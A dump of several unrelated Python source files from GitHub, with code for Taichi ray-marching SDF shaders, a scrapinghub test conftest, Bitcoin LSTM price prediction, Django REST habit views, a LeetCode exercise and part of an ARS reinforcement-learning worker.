r):\r\n \"\"\"\r\n SDF for rounded box\r\n :param p: vec3, point of the center\r\n :param b: ti.f32, half of the length of box\r\n :param r: ti.f32, radius of rounding\r\n :return: ti.f32, sdf for rounded box\r\n \"\"\"\r\n rr = vec2(r[0], r[1]) if p[0] > 0. else vec2(r[2], r[3])\r\n rr[0] = rr[0] if p.y > 0. else rr[1]\r\n q = abs(p) - b + rr[0]\r\n return min(max(q[0], q[1]), 0.) + max(q, 0.0).norm() - rr[0]\r\n\r\n\r\n@ti.func\r\ndef sd_trapezoid(p, r1, r2, he):\r\n \"\"\"\r\n SDF for trapezoid\r\n :param p: vec3, point of the center\r\n :param r1: ti.f32, length of the top side\r\n :param r2: ti.f32, length of the bottom side\r\n :param he: ti.f32, height\r\n :return: sdf for trapezoid\r\n \"\"\"\r\n k1 = vec2(r2, he)\r\n k2 = vec2(r2 - r1, 2. * he)\r\n pp = vec2(abs(p[0]), p[1])\r\n ca = vec2(pp[0] - min(pp[0], r1 if pp[1] < 0. else r2), abs(pp[1]) - he)\r\n cb = pp - k1 + k2 * clamp(dot(k1 - pp, k2) / dot2(k2), 0., 1.)\r\n s = -1. if cb[0] < 0. and ca[1] < 0. else 1.\r\n return s * ti.sqrt(min(dot2(ca), dot2(cb)))\r\n\r\n#%% SDF 3D\r\n# https://www.iquilezles.org/www/articles/distfunctions/distfunctions.htm\r\n\r\n\r\n@ti.func\r\ndef length2(p):\r\n \"\"\"\r\n Calculates length of the vector p\r\n :param p: any vec, vector\r\n :return: length of the vector p\r\n \"\"\"\r\n return length(p)\r\n\r\n\r\n@ti.func\r\ndef length6(p):\r\n \"\"\"\r\n Calculates length of the vector p in 6-dim space\r\n :param p: any vec, vector\r\n :return: length of the vector p\r\n \"\"\"\r\n q = p * p * p\r\n q *= q\r\n return (q.x + q.y + q.z)**(1./6.)\r\n\r\n\r\n@ti.func\r\ndef length8(p):\r\n \"\"\"\r\n Calculates length of the vector p in 8-dim space\r\n :param p: any vec, vector\r\n :return: length of the vector p\r\n \"\"\"\r\n q = p * p\r\n q *= q\r\n q *= q\r\n return (q.x + q.y + q.z)**(1./8.)\r\n\r\n\r\n@ti.func\r\ndef ndot(a, b):\r\n \"\"\"\r\n :param a: vec2, any vector\r\n :param b: vec2, any vector\r\n :return: a.x*b.x - a.y*b.y, ti.f32\r\n \"\"\"\r\n return a.x*b.x - a.y*b.y\r\n\r\n\r\n@ti.func\r\ndef sd_sphere(p, r):\r\n \"\"\"sdf for sphere\r\n :param p: vec3, coord of the center of sphere\r\n :param r: ti.f32, radius\r\n :return length(p) - r: sdf for sphere\r\n \"\"\"\r\n # same as sd_circle\r\n return length(p) - r\r\n\r\n\r\n@ti.func\r\ndef sd_torus(p, r): # p: vec3, t: vec2\r\n \"\"\"sdf for torus\r\n :param p: vec3, coord of the center of torus\r\n :param r: vec2, outer and inner radiuses\r\n :return length(q) - r.y: ti.f32 sdf for torus\r\n \"\"\"\r\n q = vec2(length(vec2(p.x, p.z)) - r.x, p.y)\r\n return length(q) - r.y\r\n\r\n\r\n@ti.func\r\ndef sd_cylinder(p, c): # p: vec3, c: vec3\r\n \"\"\"sdf for cylinder\r\n :param p: vec3, coord of the center of cylinder\r\n :param c: vec3, parameters of cylinder\r\n :return ti.f32: sdf for cylinder\r\n \"\"\"\r\n pxz = vec2(p.x, p.z)\r\n cxy = vec2(c.x, c.y)\r\n return length(pxz - cxy) - c.z\r\n\r\n\r\n@ti.func\r\ndef sd_cappedcylinder(p, h, r): # p: vec3, h: ti.f32, r: ti.f32\r\n \"\"\"sdf for cylinder\r\n :param p: vec3, coord of the placement of cylinder\r\n :param h: ti.f32, height of cylinder\r\n :param r: ti.f32, radius of cylinder\r\n :return ti.f32: sdf for cylinder\r\n \"\"\"\r\n pxz = vec2(p.x, p.z)\r\n d = abs(vec2(length(pxz), p.y)) - vec2(h, r)\r\n return min(max(d.x, d.y), 0.0) + length(max(d, 0.0))\r\n\r\n\r\n@ti.func\r\ndef sd_cone(p, c, h): # p: vec3, c: vec2, h: ti.f32\r\n \"\"\"\r\n c is the sin / cos of the angle, h is height\r\n Alternatively pass q instead of(c, h), which is the\r\n point at the base in 2D\r\n\r\n sdf for cone\r\n :param p: vec3, coord of the placement of cone\r\n :param c: vec2, the sin / cos of the angle\r\n :param h: ti.f32, height of cone\r\n :return ti.f32: sdf for cone\r\n \"\"\"\r\n q = h * vec2(c.x / c.y, -1.0)\r\n w = vec2(length(p.xz), p.y)\r\n a = w - q * clamp(dot(w, q) / dot(q, q), 0.0, 1.0)\r\n b = w - q * vec2(clamp(w.x / q.x, 0.0, 1.0), 1.0)\r\n k = sign(q.y)\r\n d = min(dot(a, a), dot(b, b))\r\n s = max(k * (w.x * q.y - w.y * q.x), k * (w.y - q.y))\r\n return ti.sqrt(d) * sign(s)\r\n\r\n\r\n@ti.func\r\ndef sd_ellipsoid(p, r): # p: vec3, r: vec3\r\n \"\"\"sdf for ellipsoid\r\n :param p: vec3, coord of the center of ellipsoid\r\n :param r: vec3, sizes of ellipsoid\r\n :return ti.f32: sdf for ellipsoid\r\n \"\"\"\r\n pr = p / r\r\n k0 = length(pr)\r\n k1 = length(pr/r)\r\n return k0 * (k0 - 1.0) / k1\r\n\r\n\r\n@ti.func\r\ndef op_rep(p, c): # p: vec3, c: vec3\r\n \"\"\"\r\n Creates infinite copies of an object\r\n :param p: vec3,\r\n :param c: vec3,\r\n :return:\r\n \"\"\"\r\n c_half = 0.5 * c\r\n return (p + c_half) % c - c_half\r\n\r\n\r\n@ti.func\r\ndef op_replim(p, c, l): # p: vec3, c: ti.f32, l: vec3\r\n \"\"\"\r\n Creates multiple copies of an object\r\n :param p: vec3, pixel coords\r\n :param c: ti.f32, scale\r\n :param l: vec3, border of repetition\r\n :return: vec3, new pixel coords\r\n \"\"\"\r\n return p - c * clamp(ti.round(p / c), -l, l)\r\n\r\n\r\n@ti.func\r\ndef op_cheapbend(p, k): # p: vec3, k: ti.f32\r\n \"\"\"\r\n Bends primitive along the axis y\r\n :param p: vec3, point\r\n :param k: ti.f32, coefficient of the rotation\r\n :return: vec3, rotated point\r\n \"\"\"\r\n alpha = k * p.x\r\n m = rot(alpha)\r\n q = m @ p.xy\r\n return vec3(q.x, q.y, p.z)\r\n\r\n@ti.func\r\ndef checker(p, t):\r\n \"\"\"\r\n Draws checkers pattern\r\n :param p: vec2, point\r\n :param t: ti.f32, sharpness\r\n :return: float, checkers\r\n \"\"\"\r\n fxy = abs(fract((p + 0.5) / 2.0) - 0.5) - 0.25\r\n fxy = clamp(fxy * t + 0.5, 0.0, 1.0)\r\n f = mix(fxy.x, 1.0 - fxy.x, fxy.y)\r\n return f\r\n\r\n\r\n@ti.func\r\ndef checkersTextureGradBox(p, ddx, ddy): # p: vec2, ddx: vec2, ddy: vec2\r\n \"\"\"\r\n Draws nice checkers pattern\r\n :param p: vec2, pixel\r\n :param ddx: vec2, x-dim ray differential\r\n :param ddy: vec2, y-dim ray differential\r\n :return: float, nice checkers\r\n \"\"\"\r\n # filter kernel\r\n w = max(abs(ddx), abs(ddy)) + 0.01\r\n # analytical integral (box filter)\r\n i = 2.0 * (abs(fract((p - 0.5 * w) / 2.0) - 0.5) -\r\n abs(fract((p + 0.5 * w) / 2.0) - 0.5)) / w\r\n # xor pattern\r\n return 0.5 - 0.5 * i.x * i.y\r\n\r\n#%%\r\n\r\n@ti.func\r\ndef lookat(pos, look, up, s):\r\n \"\"\"\r\n :param pos: coordinates of the point of view\r\n :param look: coordinates of the point of the direction of view\r\n :param up: vertical up vector\r\n :param s: scale\r\n :return: scaled looking vector, vector to the right from the looking vector, up vector\r\n \"\"\"\r\n f = normalize(look - pos) # front\r\n r = normalize(cross(up, f)) # right\r\n u = cross(f, r) # up\r\n return f * s, r, u\r\n # return mat3([[r.x, u.x, f.x],\r\n # [r.y, u.y, f.y],\r\n # [r.z, u.z, f.z]])\r\n\r\n\r\n@ti.func\r\ndef lookat_raydir(uv, p, l, z): # uv: vec2, p: vec3, l: vec3, z: ti.f32\r\n \"\"\"\r\n :param uv: pixel coordinates\r\n :param p: camera position?\r\n :param l: camera look_at?\r\n :param z: scale?\r\n :return: vec3, pixel that camera sees\r\n \"\"\"\r\n f = normalize(l - p)\r\n r = normalize(cross(vec3(0., 1., 0.), f))\r\n u = cross(f, r)\r\n c = f * z\r\n i = c + uv.x * r + uv.y * u\r\n return normalize(i)\r\n\r\n\r\n@ti.func\r\ndef argmin(v):\r\n \"\"\"\r\n :param v: array\r\n :return: m, j - value and index of the smaller element\r\n \"\"\"\r\n m = v[0]\r\n j = 0\r\n for i in ti.static(range(1, len(v))):\r\n if v[i] < m:\r\n j = i\r\n m = v[i]\r\n return m, j\r\n\r\n","repo_name":"grilya-g/ray_marching","sub_path":"shader_funcs.py","file_name":"shader_funcs.py","file_ext":"py","file_size_in_byte":16209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1563302696","text":"import os\n\nimport vcr\nimport pytest\nimport shutil\nimport requests\nfrom requests import HTTPError\n\nfrom scrapinghub import HubstorageClient\nfrom scrapinghub.hubstorage.utils import urlpathjoin\nfrom scrapinghub.hubstorage.serialization import MSGPACK_AVAILABLE\n\nfrom ..conftest import request_accept_header_matcher\nfrom ..conftest import VCRGzipSerializer\nfrom ..conftest import (\n TEST_PROJECT_ID,\n TEST_ENDPOINT,\n TEST_AUTH,\n TEST_BOTGROUP,\n TEST_COLLECTION_NAME,\n TEST_SPIDER_NAME,\n)\n\n# vcrpy creates the cassetes automatically under VCR_CASSETES_DIR\nVCR_CASSETES_DIR = 'tests/hubstorage/cassetes'\n\nmy_vcr = vcr.VCR(cassette_library_dir=VCR_CASSETES_DIR, record_mode='once')\nmy_vcr.register_serializer('gz', VCRGzipSerializer())\nmy_vcr.register_matcher('accept_header', request_accept_header_matcher)\nmy_vcr.serializer = 'gz'\nmy_vcr.match_on = ('method', 'scheme', 'host', 'port',\n 'path', 'query', 'accept_header')\n\n\ndef pytest_configure(config):\n if config.option.update_cassettes:\n # there's vcr `all` mode to update cassettes but it doesn't delete\n # or clear existing records, so its size will always only grow\n if os.path.exists(VCR_CASSETES_DIR):\n shutil.rmtree(VCR_CASSETES_DIR)\n elif config.option.ignore_cassettes:\n # simple hack to just ignore vcr cassettes:\n # - all record_mode means recording new interactions + no replay\n # - before_record returning None means skipping all the requests\n global my_vcr\n my_vcr.record_mode = 'all'\n my_vcr.before_record_request = lambda request: None\n\n\ndef is_using_real_services(request):\n return (request.config.option.update_cassettes or\n request.config.option.ignore_cassettes)\n\n\n@pytest.fixture(scope='session')\ndef hsclient():\n return HubstorageClient(auth=TEST_AUTH, endpoint=TEST_ENDPOINT)\n\n\n@pytest.fixture(scope='session')\ndef hsproject(hsclient):\n return hsclient.get_project(TEST_PROJECT_ID)\n\n\n@pytest.fixture(scope='session')\n@my_vcr.use_cassette()\ndef hsspiderid(hsproject):\n return str(hsproject.ids.spider(TEST_SPIDER_NAME, create=1))\n\n\n@pytest.fixture(scope='session')\ndef hscollection(hsproject, request):\n collection = get_test_collection(hsproject)\n if is_using_real_services(request):\n clean_collection(collection)\n yield collection\n\n\n@pytest.fixture(autouse=True, scope='session')\ndef setup_session(hsclient, hsproject, hscollection, request):\n if is_using_real_services(request):\n set_testbotgroup(hsproject)\n remove_all_jobs(hsproject)\n yield\n hsclient.close()\n\n\n@pytest.fixture(params=['json', 'msgpack'])\ndef json_and_msgpack(hsclient, monkeypatch, request):\n if request.param == 'json':\n monkeypatch.setattr(hsclient, 'use_msgpack', False)\n elif not MSGPACK_AVAILABLE or request.config.getoption(\"--disable-msgpack\"):\n pytest.skip(\"messagepack-based tests are disabled\")\n return request.param\n\n\n@pytest.fixture(autouse=True)\ndef setup_vcrpy(request, hsproject):\n # generates names like \"test_module/test_function.yaml\"\n # otherwise it uses current function name (setup_vcrpy) for all tests\n # other option is to add vcr decorator to each test separately\n serializer_suffix = ''\n if ('json_and_msgpack' in request.fixturenames and\n request.getfixturevalue('json_and_msgpack') == 'json'):\n serializer_suffix = '-json'\n cassette_name = '{}/{}{}.gz'.format(\n request.function.__module__.split('.')[-1],\n request.function.__name__,\n serializer_suffix\n )\n if is_using_real_services(request):\n remove_all_jobs(hsproject)\n with my_vcr.use_cassette(cassette_name):\n yield\n\n\n# ----------------------------------------------------------------------------\n\n\ndef start_job(hsproject, **startparams):\n jobdata = hsproject.jobq.start(**startparams)\n if jobdata:\n jobkey = jobdata.pop('key')\n jobauth = (jobkey, jobdata['auth'])\n return hsproject.get_job(jobkey, jobauth=jobauth, metadata=jobdata)\n\n\n# Clean environment section\n\n\ndef remove_all_jobs(hsproject):\n for k in list(hsproject.settings.keys()):\n if k != 'botgroups':\n del hsproject.settings[k]\n hsproject.settings.save()\n\n # Cleanup JobQ: run 2 times to ensure we covered all jobs\n for queuename in ('pending', 'running', 'finished')*2:\n info = hsproject.jobq.summary(queuename)\n for summary in info['summary']:\n _remove_job(hsproject, summary['key'])\n\n\ndef _remove_job(hsproject, jobkey):\n hsproject.jobq.finish(jobkey)\n hsproject.jobq.delete(jobkey)\n # delete job\n assert jobkey.startswith(TEST_PROJECT_ID), jobkey\n hsproject.jobs.apidelete(jobkey.partition('/')[2])\n\n# Collection helpers section\n\n\ndef get_test_collection(project):\n return project.collections.new_store(TEST_COLLECTION_NAME)\n\n\ndef clean_collection(collection):\n try:\n for item in collection.iter_values():\n collection.delete(item['_key'])\n except HTTPError as e:\n # if collection doesn't exist yet service responds 404\n if e.response.status_code != 404:\n raise\n\n\n# Botgroups helpers section\n\n\ndef set_testbotgroup(hsproject):\n hsproject.settings.apipost(jl={'botgroups': [TEST_BOTGROUP]})\n # Additional step to populate JobQ's botgroups table\n url = urlpathjoin(TEST_ENDPOINT, 'botgroups', TEST_BOTGROUP, 'max_running')\n requests.post(url, auth=hsproject.auth, data='null')\n hsproject.settings.expire()\n\n\ndef unset_testbotgroup(hsproject):\n hsproject.settings.apidelete('botgroups')\n hsproject.settings.expire()\n # Additional step to delete botgroups in JobQ\n url = urlpathjoin(TEST_ENDPOINT, 'botgroups', TEST_BOTGROUP)\n requests.delete(url, auth=hsproject.auth)\n","repo_name":"scrapinghub/python-scrapinghub","sub_path":"tests/hubstorage/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":5813,"program_lang":"python","lang":"en","doc_type":"code","stars":199,"dataset":"github-code","pt":"44"} +{"seq_id":"23869379879","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport plotly.express as px\nimport tensorflow as tf\nfrom sklearn.preprocessing import MinMaxScaler\n\ndf = pd.read_csv('/Users/daniele/Desktop/Stock BTC Prediction/BTC-USD-all.csv', index_col=0)\ndf.drop(['Adj Close', 'Volume'], axis=1, inplace=True)\ndf.head()\n\n\n# Train val test split\nn = len(df)\ntrain_df = df[0:int(n*0.7)]\nval_df = df[int(n*0.7):int(n*0.9)]\ntest_df = df[int(n*0.9):]\nprint(train_df.shape)\nprint(val_df.shape)\nprint(test_df.shape)\nnum_features = df.shape[1]\nprint(num_features)\n\n\n# Min Max Scaler\ntrain = train_df\nscalers={}\nfor i in train_df.columns:\n scaler = MinMaxScaler(feature_range=(-1,1))\n s_s = scaler.fit_transform(train[i].values.reshape(-1,1))\n s_s=np.reshape(s_s,len(s_s))\n scalers['scaler_'+ i] = scaler\n train[i]=s_s\n\ntest = test_df\nfor i in train_df.columns:\n scaler = scalers['scaler_'+i]\n s_s = scaler.transform(test[i].values.reshape(-1,1))\n s_s=np.reshape(s_s,len(s_s))\n scalers['scaler_'+i] = scaler\n test[i]=s_s\n\nval = val_df\nfor i in train_df.columns:\n scaler = scalers['scaler_'+i]\n s_s = scaler.transform(val[i].values.reshape(-1,1))\n s_s=np.reshape(s_s,len(s_s))\n scalers['scaler_'+i] = scaler\n val[i]=s_s\n\n\n# Function for window split\ndef split_series(series, n_past, n_future):\n #\n # n_past ==> no of past observations\n #\n # n_future ==> no of future observations\n #\n X, y = list(), list()\n for window_start in range(len(series)):\n past_end = window_start + n_past\n future_end = past_end + n_future\n if future_end > len(series):\n break\n # slicing the past and future parts of the window\n past, future = series[window_start:past_end, :], series[past_end:future_end, :]\n X.append(past)\n y.append(future)\n return np.array(X), np.array(y)\n\n\nn_past = 6\nn_future = 1\nn_features = 4\n\n\nX_train, y_train = split_series(train.values,n_past, n_future)\nX_train = X_train.reshape((X_train.shape[0], X_train.shape[1],n_features))\ny_train = y_train.reshape((y_train.shape[0], y_train.shape[1], n_features))\nX_val, y_val = split_series(val.values,n_past, n_future)\nX_val = X_val.reshape((X_val.shape[0], X_val.shape[1],n_features))\ny_val = y_val.reshape((y_val.shape[0], y_val.shape[1], n_features))\nX_test, y_test = split_series(test.values,n_past, n_future)\nX_test = X_test.reshape((X_test.shape[0], X_test.shape[1],n_features))\ny_test = y_test.reshape((y_test.shape[0], y_test.shape[1], n_features))\n\n\n# Model\n# E1D1\n# n_features ==> no of features at each timestep in the data.\nencoder_inputs = tf.keras.layers.Input(shape=(n_past, n_features))\nencoder_l1 = tf.keras.layers.LSTM(100, return_state=True)\nencoder_outputs1 = encoder_l1(encoder_inputs)\n\nencoder_states1 = encoder_outputs1[1:]\n\ndecoder_inputs = tf.keras.layers.RepeatVector(n_future)(encoder_outputs1[0])\n\ndecoder_l1 = tf.keras.layers.LSTM(100, return_sequences=True)(decoder_inputs,initial_state = encoder_states1)\ndecoder_outputs1 = tf.keras.layers.TimeDistributed(tf.keras.layers.Dense(n_features))(decoder_l1)\n\nmodel_e1d1 = tf.keras.models.Model(encoder_inputs,decoder_outputs1)\n\nmodel_e1d1.summary()\n\n# E2D2\n# n_features ==> no of features at each timestep in the data.\nencoder_inputs = tf.keras.layers.Input(shape=(n_past, n_features))\nencoder_l1 = tf.keras.layers.LSTM(100,return_sequences = True, return_state=True)\nencoder_outputs1 = encoder_l1(encoder_inputs)\nencoder_states1 = encoder_outputs1[1:]\nencoder_l2 = tf.keras.layers.LSTM(100, return_state=True)\nencoder_outputs2 = encoder_l2(encoder_outputs1[0])\nencoder_states2 = encoder_outputs2[1:]\n\ndecoder_inputs = tf.keras.layers.RepeatVector(n_future)(encoder_outputs2[0])\n\ndecoder_l1 = tf.keras.layers.LSTM(100, return_sequences=True)(decoder_inputs,initial_state = encoder_states1)\ndecoder_l2 = tf.keras.layers.LSTM(100, return_sequences=True)(decoder_l1,initial_state = encoder_states2)\ndecoder_outputs2 = tf.keras.layers.TimeDistributed(tf.keras.layers.Dense(n_features))(decoder_l2)\n\nmodel_e2d2 = tf.keras.models.Model(encoder_inputs,decoder_outputs2)\n\nmodel_e2d2.summary()\n\n\nreduce_lr = tf.keras.callbacks.LearningRateScheduler(lambda x: 1e-3 * 0.90 ** x)\nearly_stopping = tf.keras.callbacks.EarlyStopping(\n monitor='val_loss', min_delta=0, patience=0, verbose=1,\n mode='auto', baseline=None, restore_best_weights=False\n)\nmodel_e1d1.compile(optimizer=tf.keras.optimizers.Adam(), loss=tf.keras.losses.MeanSquaredError())\nhistory_e1d1=model_e1d1.fit(X_train,y_train,epochs=25,validation_data=(X_test,y_test),batch_size=32,verbose=1,callbacks=[reduce_lr, early_stopping])\nmodel_e2d2.compile(optimizer=tf.keras.optimizers.Adam(), loss=tf.keras.losses.MeanSquaredError())\nhistory_e2d2=model_e2d2.fit(X_train,y_train,epochs=25,validation_data=(X_val,y_val),batch_size=32,verbose=1,callbacks=[reduce_lr, early_stopping])\n\n\nplt.plot(history_e1d1.history['loss'])\nplt.plot(history_e1d1.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'val'], loc='upper left')\nplt.show()\n\n\nplt.plot(history_e2d2.history['loss'])\nplt.plot(history_e2d2.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'val'], loc='upper left')\nplt.show()\n\n\npred_e2d2=model_e2d2.predict(X_test)\n\nprint(pred_e2d2.shape)\n\n\nX_prova = X_test\ny_prova = []\npred = []\ntest = []\n\nfor _ in range(0,len(X_prova)):\n for i in X_prova[_]:\n y_prova.append(i[0])\n\n for i in pred_e2d2[_]:\n pred.append(i[0])\n\n for i in y_test[_]:\n test.append(i[0])\n\nprint(len(y_prova))\nprint(len(pred))\nprint(len(test))\n\nplt.figure()\nplt.scatter(list(range(0,len(y_prova))),y_prova)\nplt.scatter(list(range(n_past,(len(pred)*n_past)+n_past, n_past)),pred)\nplt.scatter(list(range(n_past,(len(test)*n_past)+n_past, n_past)),test)\nplt.show()\n\n\n\n\nreduce_lr = tf.keras.callbacks.LearningRateScheduler(lambda x: 1e-3 * 0.90 ** x)\nearly_stopping = tf.keras.callbacks.EarlyStopping(\n monitor='val_loss', min_delta=0, patience=0, verbose=1,\n mode='auto', baseline=None, restore_best_weights=False\n)\n\nmodel_lstm = tf.keras.models.Sequential([\n tf.keras.layers.Input(shape=(n_past, n_features)),\n # Shape [batch, time, features] => [batch, time, lstm_units]\n tf.keras.layers.LSTM(64, return_sequences=False),\n # Shape => [batch, time, features]\n tf.keras.layers.Dense(units=n_features),\n #tf.keras.layers.RepeatVector(n_future)\n tf.keras.layers.Reshape((1, 4))\n])\n\nmodel_lstm.summary()\n\nmodel_lstm.compile(optimizer=tf.keras.optimizers.Adam(), loss=tf.keras.losses.MeanAbsoluteError())\nhistory_lstm=model_lstm.fit(X_train,y_train,epochs=100,validation_data=(X_val,y_val),batch_size=32,verbose=1,callbacks=[reduce_lr, early_stopping])\n\nplt.plot(history_lstm.history['loss'])\nplt.plot(history_lstm.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'val'], loc='upper left')\nplt.show()\n\npred_lstm=model_lstm.predict(X_test)\n\n# Plot test prediction \nX_prova = X_test\ny_prova = []\npred = []\ntest = []\n\nfor _ in range(0,len(X_prova)):\n for i in X_prova[_]:\n y_prova.append(i[3])\n\n for i in pred_lstm[_]:\n pred.append(i[3])\n\n for i in y_test[_]:\n test.append(i[3])\n\nprint(len(y_prova))\nprint(len(pred))\nprint(len(test))\n\nplt.figure()\n#plt.scatter(list(range(0,len(y_prova))),y_prova)\nplt.plot(list(range(n_past,(len(pred)*n_past)+n_past, n_past)),pred)\nplt.plot(list(range(n_past,(len(test)*n_past)+n_past, n_past)),test)\nplt.legend(['y_pred', 'y_test'], loc='upper left')\nplt.show()\n\n\n\n\n\n\n# Multi LSTM Model\nOUT_STEPS = 1\nmulti_lstm_model = tf.keras.Sequential([\n tf.keras.layers.Input(shape=(n_past, n_features)),\n # Shape [batch, time, features] => [batch, lstm_units]\n # Adding more `lstm_units` just overfits more quickly.\n tf.keras.layers.LSTM(32, return_sequences=False),\n # Shape => [batch, out_steps*features]\n tf.keras.layers.Dense(OUT_STEPS*n_features,\n kernel_initializer=tf.initializers.zeros),\n # Shape => [batch, out_steps, features]\n tf.keras.layers.Reshape((OUT_STEPS, n_features))\n])\n\nmulti_lstm_model.summary()\n\nreduce_lr = tf.keras.callbacks.LearningRateScheduler(lambda x: 1e-3 * 0.90 ** x)\nearly_stopping = tf.keras.callbacks.EarlyStopping(\n monitor='val_loss', min_delta=0, patience=0, verbose=1,\n mode='auto', baseline=None, restore_best_weights=False\n)\n\nmulti_lstm_model.compile(optimizer=tf.keras.optimizers.Adam(), loss=tf.keras.losses.MeanSquaredError())\nhistory_multi_lstm=multi_lstm_model.fit(X_train,y_train,epochs=100,validation_data=(X_val,y_val),batch_size=32,verbose=1,callbacks=[reduce_lr, early_stopping])\n\nplt.plot(history_multi_lstm.history['loss'])\nplt.plot(history_multi_lstm.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'val'], loc='upper left')\nplt.show()\n\n\npred_multi_lstm=multi_lstm_model.predict(X_test)\n\n# Plot test prediction\nX_prova = X_test\ny_prova = []\npred = []\ntest = []\n\nfor _ in range(0,len(X_prova)):\n for i in X_prova[_]:\n y_prova.append(i[3])\n\n for i in pred_multi_lstm[_]:\n pred.append(i[3])\n\n for i in y_test[_]:\n test.append(i[3])\n\nprint(len(y_prova))\nprint(len(pred))\nprint(len(test))\n\nplt.figure()\n#plt.scatter(list(range(0,len(y_prova))),y_prova)\nplt.plot(list(range(n_past,(len(pred)*n_past)+n_past, n_past)),pred)\nplt.plot(list(range(n_past,(len(test)*n_past)+n_past, n_past)),test)\nplt.legend(['y_pred', 'y_test'], loc='upper left')\nplt.show()\n","repo_name":"Daniele9193/Stock-Prediction","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":9555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"41999861427","text":"from rest_framework import generics\nfrom habits.models import Habit\nfrom habits.painators import UserHabbitsPaginator\nfrom habits.permissions import IsOwner, CannotEditOrDeletePublicHabit\nfrom habits.serializers import HabitSerializer\nfrom habits.tasks import send_periodic_message\n\n\nclass HabitAPICreateView(generics.CreateAPIView):\n queryset = Habit.objects.all()\n serializer_class = HabitSerializer\n\n permission_classes = [IsOwner]\n\n def perform_create(self, serializer):\n new_habit = serializer.save()\n\n new_habit.user = self.request.user\n\n new_habit.save()\n\n send_periodic_message(pk=new_habit.pk)\n\n\nclass HabitListAPIView(generics.ListAPIView):\n queryset = Habit.objects.all()\n serializer_class = HabitSerializer\n pagination_class = UserHabbitsPaginator\n\n permission_classes = [IsOwner]\n\n def get_queryset(self):\n user = self.request.user\n return Habit.objects.filter(user=user)\n\n\nclass HabitUpdateAPIView(generics.UpdateAPIView):\n queryset = Habit.objects.all()\n serializer_class = HabitSerializer\n\n permission_classes = [IsOwner]\n\n\nclass HabitDestroyAPIView(generics.DestroyAPIView):\n queryset = Habit.objects.all()\n serializer_class = HabitSerializer\n\n permission_classes = [IsOwner]\n\n\nclass PublicHabitListView(generics.ListAPIView):\n queryset = Habit.objects.filter(is_public=True)\n serializer_class = HabitSerializer\n permission_classes = [CannotEditOrDeletePublicHabit]\n","repo_name":"RomNikita/habbit_project","sub_path":"habits/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73294639173","text":"\"\"\"\nlc:219 : Contains Duplicate2\n\nGiven an integer array nums and an integer k,\n return true if there are two distinct indices i and j in the array such that nums[i] == nums[j] and abs(i - j) <= k.\n\n\"\"\"\n\n# Time Complexity = O(N)\n\nclass Solution:\n def containsNearbyDuplicate2(self, nums: List[int], k: int) -> bool:\n lookup =()\n L = 0\n for R in range(nums):\n\n if nums[R] in lookup:\n return True\n\n lookup.add(nums[L])\n\n if R-L+1>k:\n lookup.remove(nums[L])\n L+=1\n\n\n return False","repo_name":"psatyadileep/neetcode","sub_path":"topics/1_Arrays/sliding_window/2_contains_duplicate2.py","file_name":"2_contains_duplicate2.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7035574989","text":"import ray\nimport numpy as np\nfrom exact.utils import *\nfrom ars.shared_noise import *\nfrom ars.policies import *\nfrom gym.utils import seeding\n\n\n@ray.remote\nclass Worker(object):\n def __init__(self, seed, policy_params, deltas, params):\n\n self.env = make_env(params, seed=params['seed']) # NOTE: Need to use the same env seed across all workers for LQR\n\n self.deltas = SharedNoiseTable(deltas, seed=seed+7)\n self.policy_params = policy_params\n\n self.ac_dim = self.env.action_space.shape[0]\n\n if policy_params['type'] == 'linear':\n self.policy = LinearPolicy(policy_params, seed=params['seed'])\n else:\n raise NotImplementedError\n\n self.delta_std = params['delta_std']\n self.rollout_length = params['rollout_length']\n self.one_point = params['one_point']\n self.coord_descent = params['coord_descent']\n self.seed = seed\n self.params = params\n self.np_random, _ = seeding.np_random(seed)\n\n def get_weights_plus_stats(self):\n return self.policy.get_weights_plus_stats()\n\n def rollout(self, shift=0., rollout_length=None, noise=None, sampled_t=None):\n if rollout_length is None:\n rollout_length = self.rollout_length\n\n perturbation = True\n if noise is None:\n perturbation = False\n\n total_reward = 0\n steps = 0\n obs = []\n\n ob = self.env.reset()\n for i in range(rollout_length):\n action = self.policy.act(ob)\n if perturbation and not self.coord_descent:\n obs.append(ob)\n noise_t = noise[i, :]\n ob, reward, done, _ = self.env.step(action + noise_t)\n elif perturbation and self.coord_descent:\n if i == sampled_t:\n obs = ob.copy()\n ob, reward, done, _ = self.env.step(action + noise)\n else:\n ob, reward, done, _ = self.env.step(action)\n else:\n ob, reward, done, _ = self.env.step(action)\n steps += 1\n total_reward += (reward - shift)\n if done:\n break\n return total_reward, steps, obs\n\n def do_rollouts(self, w_policy, num_rollouts=1, shift=0., evaluate=False):\n rollout_rewards, deltas_idx, obs = [], [], []\n steps = 0\n\n for i in range(num_rollouts):\n if evaluate:\n self.policy.update_weights(w_policy)\n deltas_idx.append(-1)\n obs.append(-1)\n\n self.policy.update_filter = False\n\n reward, _, _ = self.rollout(rollout_length=self.rollout_length)\n rollout_rewards.append(reward)\n else:\n self.policy.update_weights(w_policy)\n\n sampled_t = None\n if not self.coord_descent: \n idx, delta = self.deltas.get_delta(self.ac_dim * self.rollout_length)\n delta = (self.delta_std * delta).reshape(self.rollout_length, self.ac_dim)\n else:\n idx, delta = self.deltas.get_delta(self.ac_dim)\n delta = self.delta_std * delta\n sampled_t = self.np_random.randint(low=0, high=self.rollout_length)\n\n deltas_idx.append(idx)\n\n self.policy.update_filter = True\n \n # self.policy.update_weights(w_policy + delta)\n pos_reward, pos_steps, pos_obs = 